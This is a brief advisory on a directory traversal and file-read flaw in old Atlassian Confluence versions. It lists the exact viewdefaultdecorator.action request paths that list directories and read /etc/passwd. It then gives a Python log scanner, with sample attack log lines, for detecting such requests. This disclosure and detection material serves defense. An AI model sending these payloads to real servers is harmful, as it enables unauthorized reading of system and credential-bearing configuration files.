Affected component: Atlassian Confluence
Atlassian Confluence versions below 5.8.17 contain arbitrary file read and directory traversal vulnerabilities.
/spaces/viewdefaultdecorator.action?decoratorName=.
    Lists the current directory.
/spaces/viewdefaultdecorator.action?decoratorName=/
    Lists the web service's root directory.
/spaces/viewdefaultdecorator.action?decoratorName=…/
    Lists the parent directory (does not work on some services).
/spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd
    Through the file protocol, system files and directories can be read.
The reads are not performed with root permissions, so the impact is reduced. However, the web service's configuration files can still be read, so the risk should not be underestimated.
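To check whether an instance has received such requests, the access log can be searched for the decoratorName forms listed above. The following is an added example, not part of the original advisory: it assumes a combined-format access log, and the function names, sample log lines and the benign value "page" are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # combined log format assumed
TARGET_PATH = "/spaces/viewdefaultdecorator.action"

def classify(value):
    """Return why a decoratorName value is suspicious, or None for a plain name."""
    for _ in range(3):  # bounded re-decoding normalises double URL encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    lowered = value.strip().lower().replace("\\", "/")
    if re.match(r"[a-z][a-z0-9+.-]*:", lowered):
        return "url-scheme"         # e.g. a file: URL
    if ".." in lowered.split("/"):
        return "parent-traversal"   # a parent-directory segment
    if lowered.startswith("/"):
        return "absolute-path"      # root directory listing
    if lowered in (".", "./"):
        return "current-directory"  # current directory listing
    return None

def scan(lines):
    """Return (line_number, decoded_value, reason) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not url.path.lower().endswith(TARGET_PATH):
            continue
        for value in parse_qs(url.query).get("decoratorName", []):
            reason = classify(value)
            if reason:
                hits.append((number, value, reason))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2016:10:00:01 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=page HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2016:10:02:11 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=. HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2016:10:02:15 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=/ HTTP/1.1" 200 1440',
    '203.0.113.7 - - [01/Jan/2016:10:02:19 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=%2e%2e%2f HTTP/1.1" 200 990',
    '203.0.113.7 - - [01/Jan/2016:10:02:30 +0000] "GET /spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Hits on a server running a version below 5.8.17 are a reason to review which configuration files were readable by the service account and to rotate any credentials stored in them.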